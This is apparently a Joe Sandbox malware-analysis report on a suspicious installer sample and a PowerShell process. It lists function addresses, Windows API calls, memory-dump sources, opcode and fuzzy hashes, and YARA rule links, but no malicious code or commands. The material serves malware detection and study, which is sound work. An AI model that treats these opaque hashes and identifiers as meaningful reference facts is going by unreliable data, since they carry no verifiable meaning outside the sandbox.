                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                            • String ID:
                                                                            • API String ID: 3748168415-3916222277
                                                                            • Opcode ID: 085acd60d741280dfa694cfa38d19dbe5f2a98386977293df9f6c8f4e56f0e62
                                                                            • Instruction ID: c9233ab90339d663537cd0f4838c8d9c3e37dbb77af5ce129741796423ccaa39
                                                                            • Opcode Fuzzy Hash: 085acd60d741280dfa694cfa38d19dbe5f2a98386977293df9f6c8f4e56f0e62
                                                                            • Instruction Fuzzy Hash: 4701717160060CABDF218F11ED80A9B3766EF94355F10447AF604752D0C77AAD929E2D
                                                                            Function 004038C5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,774D3420,0040389D,004036B3,00000006,?,00000006,00000008,0000000A), ref: 004038DF
                                                                            • GlobalFree.KERNEL32(?), ref: 004038E6
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004038D7
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Free$GlobalLibrary
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                            • API String ID: 1100898210-2145255484
                                                                            • Opcode ID: c5b968993c0533f4145da43d1685cce5539a5f76f40ddb7aa2d82094c30b15f3
                                                                            • Instruction ID: 4defd9e359f6bb8273ced32a5a12906ada9a5e6c3dc807c4d7f8d8681d186cd1
                                                                            • Opcode Fuzzy Hash: c5b968993c0533f4145da43d1685cce5539a5f76f40ddb7aa2d82094c30b15f3
                                                                            • Instruction Fuzzy Hash: 68E01233901520AFCA216F55ED04B5E77ADAF58B22F09417BF8807B2608B785C929BD8
                                                                            Function 00405B69 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(00438800,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,00438800,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405B6F
                                                                            • CharPrevW.USER32(00438800,00000000,00438800,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,00438800,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405B7F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CharPrevlstrlen
                                                                            • String ID: C:\Users\user\Desktop
                                                                            • API String ID: 2709904686-3080008178
                                                                            • Opcode ID: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                                            • Instruction ID: 4f2c6dc630764ad6ed400a220cd41f8d0a4aff102c3f5ecc88be1499634875f0
                                                                            • Opcode Fuzzy Hash: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                                            • Instruction Fuzzy Hash: F7D05EB2401920DAC3126704DC04DAF73A8EF12300746446AF841A6165D7786D818AAC
                                                                            Function 00405CA3 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CB3
                                                                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405CCB
                                                                            • CharNextA.USER32(00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CDC
                                                                            • lstrlenA.KERNEL32(00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE5
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                            • String ID:
                                                                            • API String ID: 190613189-0
                                                                            • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                            • Instruction ID: b35bc10bc40a781af4b0b0b13ea0e0b48c2ad23c6ba402853768862ad0a65ea6
                                                                            • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                            • Instruction Fuzzy Hash: 2CF0F631204918FFDB02DFA4CD4099FBBA8EF06350B2540BAE841FB311D634DE01ABA8

                                                                            Executed Functions

                                                                            Function 078CC93E Relevance: 8.1, Strings: 5, Instructions: 1844COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.2405084952.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_78c0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: x.k$x.k$x.k$-k$-k
                                                                            • API String ID: 0-1059763770
                                                                            • Opcode ID: 92d4bc781a1eff893131cff454b95019e84076abb8296290127c44afaad5c297
                                                                            • Instruction ID: f6e9c7c35afe63ac7a1fd861a7beee3ec478acc102c6b8e43d7d4603505846ac
                                                                            • Opcode Fuzzy Hash: 92d4bc781a1eff893131cff454b95019e84076abb8296290127c44afaad5c297
                                                                            • Instruction Fuzzy Hash: 290351B4A01319DFE724DB54C850BDAB7B2BF89314F1084A9D919AB781CB71ED82CF91
                                                                            Function 04A3EAE0 Relevance: .3, Instructions: 281COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.2400656709.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_4a30000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6510e7129b4cfcf07667a892888ece8acd1dfd60c6c3b4573c72ff9a2bf028e2
                                                                            • Instruction ID: 61409219b6a434dcc39865555804fdc36950d4382fe7dcf217a5169cc98c8daa
                                                                            • Opcode Fuzzy Hash: 6510e7129b4cfcf07667a892888ece8acd1dfd60c6c3b4573c72ff9a2bf028e2
                                                                            • Instruction Fuzzy Hash: 62B15E70E00219DFDB10CFA9D88579EBBF2BF88745F148529E815E7294FB74A842CB81
                                                                            Function 04A3F3B0 Relevance: .3, Instructions: 266COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.2400656709.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_4a30000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d4b48bbee61132416734def11f73d26bedbd6621f9b7d28de31f8a9df898a515
                                                                            • Instruction ID: 4490584ea66b13d5d8269d7bd59827a7d2f66d85d5311d80f25ab34619163872
                                                                            • Opcode Fuzzy Hash: d4b48bbee61132416734def11f73d26bedbd6621f9b7d28de31f8a9df898a515
                                                                            • Instruction Fuzzy Hash: 78B14C71E102499FDF10CFA9D88179EBBF2BF88315F148529F415EB2A4EB74A845CB81
                                                                            Function 078CD71E Relevance: 6.2, Strings: 4, Instructions: 1234COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.2405084952.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_78c0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: x.k$x.k$-k$-k
                                                                            • API String ID: 0-365018178
                                                                            • Opcode ID: 58bd468c1fc4f9e2cd61674581cc97251106daac0ce7b82a5aec42bbb7ffb00f
                                                                            • Instruction ID: f0ac34622d9db8785278a0818333f07ac2b82f9862da3de32e296cf78fee1647
                                                                            • Opcode Fuzzy Hash: 58bd468c1fc4f9e2cd61674581cc97251106daac0ce7b82a5aec42bbb7ffb00f
                                                                            • Instruction Fuzzy Hash: 5BC26274E01318AFE724DB54C950BDAB7B2AF89314F1084ADD919AB785CB31ED82CF91
                                                                            Function 078C41DA Relevance: 3.4, Strings: 2, Instructions: 888COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.2405084952.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_78c0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: x.k$-k
                                                                            • API String ID: 0-766683181
                                                                            • Opcode ID: 681c7edf6a7140d12aa401bd5a67d766270acc54fca8600ccdd774617d1c3fb4
                                                                            • Instruction ID: 7d30cdb70f3d43ad0db8440b47408a1c63b4e1361cac0421b06d5a7ccc429afa
                                                                            • Opcode Fuzzy Hash: 681c7edf6a7140d12aa401bd5a67d766270acc54fca8600ccdd774617d1c3fb4
                                                                            • Instruction Fuzzy Hash: D182A7B0E00219DFE724DF64C850B9AB7B2AB99304F10C5AED55AAB744CB71ED82CF51
                                                                            Function 078C360F Relevance: 3.2, Strings: 2, Instructions: 738COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.2405084952.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_78c0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: x.k$-k
                                                                            • API String ID: 0-766683181
                                                                            • Opcode ID: 5691ba88f2d2d6cceaad080fa3ac01d05f3aaa7fa4ddf4e5cc26c2123d6c5c25
                                                                            • Instruction ID: a1965f4027783def18a1bb3a5f277ec963c178a825365c228833477da85abcb5
                                                                            • Opcode Fuzzy Hash: 5691ba88f2d2d6cceaad080fa3ac01d05f3aaa7fa4ddf4e5cc26c2123d6c5c25
                                                                            • Instruction Fuzzy Hash: 4E6274B0E00218DFE724DB64C850B9EB7B2AB99304F10C5AED55AAB745CB71ED82CF51
                                                                            Function 078C43A4 Relevance: 3.1, Strings: 2, Instructions: 648COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.2405084952.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_78c0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: x.k$-k
                                                                            • API String ID: 0-766683181
                                                                            • Opcode ID: cb9e8ccae0faf27501e418b906522254a78721354d744890e569891efd6a9a22
                                                                            • Instruction ID: b0b3cacb918ac0e19b0917bee5fc6e423296729444e1742d53f5de5049395802
                                                                            • Opcode Fuzzy Hash: cb9e8ccae0faf27501e418b906522254a78721354d744890e569891efd6a9a22
                                                                            • Instruction Fuzzy Hash: A65285B0A00218DFE724DB64C850B9AB7B2BB99304F10C5AED55AAB745CB71ED82CF51
                                                                            Function 078CD8DF Relevance: 3.1, Strings: 2, Instructions: 627COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.2405084952.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_78c0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: x.k$-k
                                                                            • API String ID: 0-766683181
                                                                            • Opcode ID: 9b57f9aa51a697e501755366cce8a901a97f9a2fb80e80eed615a196e2367401
                                                                            • Instruction ID: 601f0db11f4f588ec8ca7e4a6c786fd1f6e3294d37ffdee44c9290f588fac488
                                                                            • Opcode Fuzzy Hash: 9b57f9aa51a697e501755366cce8a901a97f9a2fb80e80eed615a196e2367401
                                                                            • Instruction Fuzzy Hash: 17427170B01319AFE724DB54C950BDAB7B2AB89314F1084ADD919AB785CB31ED82CF91
                                                                            Function 078C5B38 Relevance: 2.9, Strings: 2, Instructions: 373COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.2405084952.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_78c0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: x.k$-k
                                                                            • API String ID: 0-766683181
                                                                            • Opcode ID: ef84cf1540b8e1386a06f212141a2841b1aa4afe0ac3d51c7de536ea01c028d7
                                                                            • Instruction ID: c9c504ef32eca384a83c26fb2a9548239634c75327eacfd9abf3521d610ea66e
                                                                            • Opcode Fuzzy Hash: ef84cf1540b8e1386a06f212141a2841b1aa4afe0ac3d51c7de536ea01c028d7
                                                                            • Instruction Fuzzy Hash: 88E191B0B012099FEB14DF94C840B9EBBB2AF88704F25C46DD501AF795CB76EC428B95
                                                                            Function 078C5B18 Relevance: 2.8, Strings: 2, Instructions: 315COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.2405084952.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_78c0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: x.k$-k
                                                                            • API String ID: 0-766683181
                                                                            • Opcode ID: 82adb624b2171964cc4342bb2926be9d35954a9953bea238abe6c010a5eac03a
                                                                            • Instruction ID: 62fa5daf2dc62ee4d3ee24e4cbd7bf97e82ae26b671a8b3c21fd4b1323b7cc90
                                                                            • Opcode Fuzzy Hash: 82adb624b2171964cc4342bb2926be9d35954a9953bea238abe6c010a5eac03a
                                                                            • Instruction Fuzzy Hash: 45C1AFB0B012059FEB14CF94C840B9EBBB2AF88314F25C46DE505AF795CB76EC428B95
                                                                            Function 078C5AE4 Relevance: 2.8, Strings: 2, Instructions: 294COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.2405084952.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_78c0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: x.k$-k
                                                                            • API String ID: 0-766683181
                                                                            • Opcode ID: de8a2a53226bd9a4a5d34298d2f324bdc5f333530b1e8df49f71ff55c509615b
                                                                            • Instruction ID: bf01a3b154e9f80d03df70c59f16dbb00296a4a1e30cb95f2d6666fd782fcf9d
                                                                            • Opcode Fuzzy Hash: de8a2a53226bd9a4a5d34298d2f324bdc5f333530b1e8df49f71ff55c509615b
                                                                            • Instruction Fuzzy Hash: 44C19CB0A01205DFEB14CF98C940B9DBBB2AF98304F24C429E501AF795CB72EC42CB95
                                                                            Function 078C5AF9 Relevance: 2.8, Strings: 2, Instructions: 287COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.2405084952.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_78c0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: x.k$-k
                                                                            • API String ID: 0-766683181
                                                                            • Opcode ID: c643076a7834652aec498ab0f425835af3ac28a71adb7c00ea4ed85bedfde963
                                                                            • Instruction ID: de341a45719b58e7d5a78b41f080e6cfa2f33cee42e4fc2e975bd456f5d3d900
                                                                            • Opcode Fuzzy Hash: c643076a7834652aec498ab0f425835af3ac28a71adb7c00ea4ed85bedfde963
                                                                            • Instruction Fuzzy Hash: F0B19DB0A01205DFEB14CF98C940B9DBBB2AF98304F24C469E505AF795CB76EC42CB95
                                                                            Function 078CDB74 Relevance: 1.7, Strings: 1, Instructions: 435COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.2405084952.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_78c0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: x.k
                                                                            • API String ID: 0-3814145804
                                                                            • Opcode ID: 14ac2fa051edafe0464a6961a64be4d722086285da1f8f9bc477ec17e620ebcd
                                                                            • Instruction ID: 008c2254053e6750c5e9818eda9e7705cc45f6d958d9021b4371d3e7de2441a0
                                                                            • Opcode Fuzzy Hash: 14ac2fa051edafe0464a6961a64be4d722086285da1f8f9bc477ec17e620ebcd
                                                                            • Instruction Fuzzy Hash: 7D12FAB0A01219DFEB24DF64C850BA9B7B2BB59304F1084EAD949EB791CB71ED81CF51
                                                                            Function 078CD969 Relevance: 1.7, Strings: 1, Instructions: 431COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.2405084952.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_78c0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: x.k
                                                                            • API String ID: 0-3814145804
                                                                            • Opcode ID: 55fc255a01d177b1e71523ca58bfe22ffe638ec61f2c0eb1ea315c7addb86008
                                                                            • Instruction ID: f7be556db56de0494425f42bc5ab7e39cbbb496a25b8aacd9dc8d1bb9f4d5471
                                                                            • Opcode Fuzzy Hash: 55fc255a01d177b1e71523ca58bfe22ffe638ec61f2c0eb1ea315c7addb86008
                                                                            • Instruction Fuzzy Hash: B212F9B0A00219DFEB24DF64C944BE9B7B2BB59304F1084A9E909EB790CB71ED81CF51
                                                                            Function 078C5FD8 Relevance: 1.4, Strings: 1, Instructions: 102COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.2405084952.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_78c0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: x.k
                                                                            • API String ID: 0-3814145804
                                                                            • Opcode ID: d093469e740c69cb7f474dfe6d06b1b6614de8ee7499803e7f59dadd2650b80c
                                                                            • Instruction ID: 56532131229751eb1851254e322f6be557f09945d5a2d0e16496658c846d4f93
                                                                            • Opcode Fuzzy Hash: d093469e740c69cb7f474dfe6d06b1b6614de8ee7499803e7f59dadd2650b80c
                                                                            • Instruction Fuzzy Hash: 8D319374B01204AFE714DBA4C851BAE7BA3ABC5714F608429EA016F7D1CFB6DC428BD5
                                                                            Function 078C49D8 Relevance: 1.1, Instructions: 1099COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.2405084952.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_78c0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 15c7c31294afe1688917f47ae3ac0347920d95d97f947cfbdcd3345980bce504
                                                                            • Instruction ID: 240975c834dc999e0b6351258bc123ae4915b75f5197a91ce4706386fc5e3f50
                                                                            • Opcode Fuzzy Hash: 15c7c31294afe1688917f47ae3ac0347920d95d97f947cfbdcd3345980bce504
                                                                            • Instruction Fuzzy Hash: 1BA264B0B00245DFEB24CBA8C454B99BBB2BB89704F24816DD915AF752CB76EC81CF51
                                                                            Function 078C49BA Relevance: .9, Instructions: 892COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.2405084952.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_78c0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0903ce95c4abb8b70168a4be7173462fdfc9e882b71430071eb5f91452bb2505
                                                                            • Instruction ID: cae4edb497040ba5019391480dd1192ccb4f1765229e651fc78aa1771fdece80
                                                                            • Opcode Fuzzy Hash: 0903ce95c4abb8b70168a4be7173462fdfc9e882b71430071eb5f91452bb2505
                                                                            • Instruction Fuzzy Hash: 618261B4A00245DFEB25CFA8C450B99BBB2FB49704F2081ADD915AB752C776EC82CF41
                                                                            Function 078C1160 Relevance: .6, Instructions: 601COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.2405084952.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_78c0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3934763a2c2871ecd21199e1ebec553ca93d8722debb8c80f0ee7fff6047ec02
                                                                            • Instruction ID: 9c2c12c2a2dc039cbb091ec8246fb216b185e414a69c2d62277af24bc0c2a577
                                                                            • Opcode Fuzzy Hash: 3934763a2c2871ecd21199e1ebec553ca93d8722debb8c80f0ee7fff6047ec02
                                                                            • Instruction Fuzzy Hash: 33326FB4B012099FE714CB98C484B9ABBF2BF99704F14846AE515EF752CB72DC42CB91
                                                                            Function 04A3AFE8 Relevance: .5, Instructions: 519COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.2400656709.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_4a30000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d65df7e93a9ef1bae73c54206dfa686ec2234397afd0332ccf9264bf2989cb46
                                                                            • Instruction ID: 38c1bc85029bf9ed8ad18fdda429b587aebb61212316c3e02d526965f4a84236
                                                                            • Opcode Fuzzy Hash: d65df7e93a9ef1bae73c54206dfa686ec2234397afd0332ccf9264bf2989cb46
                                                                            • Instruction Fuzzy Hash: D9225D34B002189FDB25DB24C854BAEB7B2BF89315F1480E9D50AAB351DB35EE85CF91
                                                                            Function 04A372A8 Relevance: .3, Instructions: 313COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.2400656709.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_4a30000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d1786afa7d52f258a26a943059905edbe4a1020ae9cddf846453b843037d3a9a
                                                                            • Instruction ID: b795655eb1b3c3e3211c52ee057db46ba5c3071f6fc58a8720805f56e3be8e13
                                                                            • Opcode Fuzzy Hash: d1786afa7d52f258a26a943059905edbe4a1020ae9cddf846453b843037d3a9a
                                                                            • Instruction Fuzzy Hash: 1FC1B079A00208DFDB14DFA8D944A9DBBF2FF88311F158569E405AB764EB74EC89CB40
                                                                            Function 04A3EAD4 Relevance: .3, Instructions: 278COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.2400656709.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_4a30000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9db64ae188320ad60d0cdd9ca51b1c1b36b756d0284efc743a415ace8ac9a9bc
